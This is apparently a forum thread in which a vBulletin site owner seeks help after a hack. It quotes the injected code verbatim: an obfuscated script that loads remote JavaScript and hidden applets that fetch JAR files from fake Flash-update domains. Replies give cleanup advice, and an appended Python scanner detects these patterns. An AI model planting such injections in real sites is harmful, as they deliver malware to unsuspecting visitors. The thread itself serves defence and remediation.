My Vb4.1 was hacked !!! Please Help

  • [Forum] My Vb4.1 was hacked !!! Please Help

    Anyone, please help me. A hacker added this script to my clientscript folder. They also added it to my styles and templates. I don't know how they do it, but I did chmod everything to 555 and they still add this code to my site.

    <script>var y ="jquery";var z = "plugins";var x ="http://";var t = ".org";var w = "jquery14";var u="script";document.write("<"+u+ " src=\""+ x + y + z + t + "/"+w+".js\""+">"+"</"+u+">");</script>


    Please help me, I am so tired. Does anyone know where styles and templates are stored on the server? I need to change their permissions.

  • #2
    1. Re-upload all files in your root directory.
    2. Run this mod: http://www.vbulletin.org/forum/showthread.php?t=220967 (Yes, I know it's a 3.8 mod, but it works on 4.0)
    3. Change all passwords (FTP, Admin Accounts, cPanel, Database PW's, etc)
    4. Good luck.



    • #3
      Thank you so much, I will try it.



      • #4
        No problems. It sucks having that feeling that someone else has been in your stuff.



        • #5
          They can still get into my site. I think this is a VB4 problem because they can log in to any admin username.
          I did change all my passwords. I also deleted all files and then uploaded VB4 again, but somehow they can access the admin account. I don't know what to do.



          • #6
            Protect your admincp folder with htaccess/htpasswd files.



            • #7
              Are you on a shared server?


              • #8
                Originally posted by chithanh
                They can still get into my site. I think this is a VB4 problem because they can log in to any admin username.
                I did change all my passwords. I also deleted all files and then uploaded VB4 again, but somehow they can access the admin account. I don't know what to do.
                Change the admincp location and rename the folder.



                • #9
                  I run my own server, hosted by The Planet. I did change my admincp, but they know my password right after I change it. They insert this HTML code into my script. I don't know what they are trying to do.

                  <script>var y ="jquery";var z = "plugins";var x ="http://";var t = ".org";var w = "jquery14";var u="script";document.write("<"+u+ " src=\""+ x + y + z + t + "/"+w+".js\""+">"+"</"+u+">");</script>

                  <applet code="FlashPlayer.class" width="1" height="1" archive="http://adobe-upgrade.com/FlashPlayer.jar">
                  <param NAME="_cx" VALUE="26">
                  <param NAME="_cy" VALUE="26">
                  </applet><applet code="FlashPlayer.class" width="1" height="1" archive="http://flash-update.info/FlashPlayer.jar">
                  <param NAME="_cx" VALUE="26">
                  <param NAME="_cy" VALUE="26">
                  </applet>



                  • #10
                    I bet it's your hosting company that is using unpatched/vulnerable software... either Apache or a known Linux kernel bug. Call them and tell them to update their stuff.


                    • #11
                      If you are noticing that the script is installed as soon as you upload new files and change your passwords, it is possible that you are uploading the script yourself. In other words, the trojan may be on your local computer. Run an antivirus scan (like Eset's Online Scanner - free), then download a fresh set of vB files from your Members' Area and upload those as suggested above. If you are infected locally, however, you can keep uploading new files until the cows come home and it won't do one bit of good. Also, are you replacing just the vBulletin files on your server? Have you inspected other non-vB files?



                      • #12
                        Originally posted by Loco.M
                        Are you on a shared server?
                        Is that a bad thing if you are?

                        I am, does that put me at risk?


                        • #13
                          Originally posted by GRABALANE
                          Is that a bad thing if you are?

                          I am, does that put me at risk?
                          No, it does not, provided you have a good host.




                          • #14
                            I will try again with another computer. Maybe my computer is uploading a virus file. I will redo everything to see what is wrong.



                            • #15
                              Also make sure that you do not have any files or folders with 777 permissions.

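A defender-side check for the symptoms described in this thread, as an added example that is not part of any post: it walks a web root and reports files matching the two injected patterns quoted above (a script tag assembled inside `document.write`, an applet whose `archive` is a remote URL) plus anything world-writable, as post #15 advises. The function names, the extension list and the sample tree are assumptions made for illustration, and it only inspects files on disk.

```python
import os
import re
import stat
import sys
import tempfile

SIGNATURES = {
    # <script> tag assembled piece by piece inside document.write(...)
    "split-script-write": re.compile(rb'document\.write\(\s*["\']<["\']\s*\+'),
    # <applet> whose archive= attribute loads a JAR from a remote URL
    "remote-applet": re.compile(rb'<applet\b[^>]*\barchive\s*=\s*["\']?https?://', re.I),
}
TEXT_EXT = (".js", ".php", ".html", ".htm", ".css", ".xml")


def scan_tree(root):
    """Return sorted (relative_path, finding) pairs for everything under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = os.lstat(path).st_mode  # lstat: symlinks are not followed
            if mode & stat.S_IWOTH and not stat.S_ISLNK(mode):
                findings.append((rel, "world-writable"))  # post #15: 777, 666, ...
            if stat.S_ISREG(mode) and name.lower().endswith(TEXT_EXT):
                with open(path, "rb") as fh:
                    data = fh.read()
                findings += [(rel, k) for k, rx in SIGNATURES.items() if rx.search(data)]
    return sorted(findings)


def demo():
    root = tempfile.mkdtemp()
    samples = {  # constructed sample files; hosts are .invalid placeholders
        "clientscript/vb.js": b'var u="script";document.write("<"+u+" src=//cdn.invalid/a.js>");',
        "index.php": b'<applet code="X.class" width="1" height="1" archive="http://dl.invalid/X.jar">',
        "clean.js": b'document.write("<p>hello</p>");',
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), mode=0o755, exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, 0o777 if rel == "clean.js" else 0o644)
    return scan_tree(root)


if __name__ == "__main__":
    print(*scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo(), sep="\n")
```

Run it with the web root as the only argument; with no argument it scans the constructed sample tree. A hit is a lead to review by hand, and a clean result does not rule out other forms of injection.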